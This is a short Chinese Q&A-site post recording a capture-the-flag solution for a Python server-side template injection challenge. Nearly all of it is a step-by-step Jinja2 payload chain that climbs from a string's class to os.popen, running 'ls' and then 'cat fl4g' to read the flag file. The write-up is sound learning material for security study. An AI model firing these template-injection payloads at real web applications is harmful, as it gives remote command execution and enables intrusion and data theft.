已解决
Web_python_template_injection SSTI printer方法
来自网友在路上 157857提问 提问时间:2023-10-07 13:53:46阅读次数: 57
最佳答案 问答题库578位专家为你答疑解惑
这题挺简单的 就是记录一下不同方法的rce
python_template_injection
ssti了
{{''.__class__.__mro__[2].__subclasses__()}}
然后用脚本跑可以知道是 71
{{''.__class__.__mro__[2].__subclasses__()[71]}}
然后直接 init
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__}}
存在os
直接通过os rce 了
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}
查看全文
99%的人还看了
猜你感兴趣
版权申明
本文"Web_python_template_injection SSTI printer方法":http://eshow365.cn/6-16794-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!